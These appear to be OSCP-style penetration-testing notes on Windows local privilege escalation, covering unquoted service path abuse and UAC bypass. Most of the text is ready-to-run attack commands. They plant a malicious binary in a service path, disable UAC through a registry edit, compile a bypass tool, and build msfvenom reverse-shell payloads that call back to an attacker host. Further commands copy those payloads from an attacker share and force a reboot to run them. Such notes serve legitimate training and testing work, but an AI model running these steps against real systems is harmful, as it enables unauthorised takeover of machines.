Unquoted path Manual Exploitation
C:\Program Files directory, which contains a space character in its name.
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
Finding the correct binary path is possible Under services in Winpeas.
Also you can list the services with
net start
wmic service list brief
sc query
Get-Service
Services - Unquoted Paths
Conditions:
Path to service is unquoted and has spaces.
Running with LocalSystem or equivalent Administrative permissions.
User should have write permissions to a folder in the path.
User should have permission to start the service OR the service auto-restarts on shutdown/start-up.
Find unquoted paths with WMIC:
Find all services with "auto" start mode (automatically starts at system start-up),
cmd> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Exploit steps:
Find unquoted service binpaths, for services run as ADMIN e.g. binpath= C:\Program Files\A bad folder\adminservice.exe.
Check if you have FULL/WRITE (F)(W) permissions along path using:
a) icacls "C:\Program Files\folder\A unquoted folder\adminservice.exe"
b) accesschk.exe -ucqv [/path/to/unquoted/folder] -accepteula
Generate reverse shell payload and rename to path e.g. A.exe.
Place malicious binary in path, so that it is executed e.g. move A.exe "C:\Program Files\folder".
Execute by restarting computer (if service has startmode = auto) with shutdown /r /t 0.
User Account Control (UAC) Bypass
Even if you are a local admin, User Account Control (UAC) maybe turned on which may force your user to respond to UAC credential/consent prompts in order to perform privileged actions.
UAC bypass walkthrough: https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
STEP 1: Check if we should perform UAC bypass
cmd> whoami /priv # do we have very few privileges even as local admin?
cmd> whoami /groups # is "Mandatgory Label\XXX Mandatory Level" set to MEDIUM?
cmd> psexec.exe -i -accepteula -d -s rshell.exe # are we getting issues running psexec as SYSTEM?
# check if UAC turned on
cmd> reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
...
EnableLUA REG_DWORD 0x1 # if 0x1 = UAC ENABLED
ConsentPromptBehaviorAdmin REG_DWORD 0x5 # if NOT 0x0 = consent required
PromptOnSecureDesktop REG_DWORD 0x1 # if 0x1 = Force all credential/consent prompts
...
# try to disable UAC
cmd> reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD
STEP 2: Prepare exploits
# modify uac-bypass.c to execute reverse shell
# compile w/ correct architecture
$ x86_64-w64-mingw32-gcc ~/OSCP-2022/Tools/privesc-windows/uac-bypass.c -o uac-bypass.exe
# generate reverse shell payload
$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=[kali] LPORT=666 -f exe -o rshell.exe
STEP 3: Transfer, setup listener and exec payload
cmd> copy \\[kali]\[share]\uac-bypass.exe uac-bypass.exe
cmd> copy \\[kali]\[share]\rshell.exe rshell.exe
cmd> .\uac-bypass.exe
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.129 LPORT=443 -f exe > program.exe
Last updated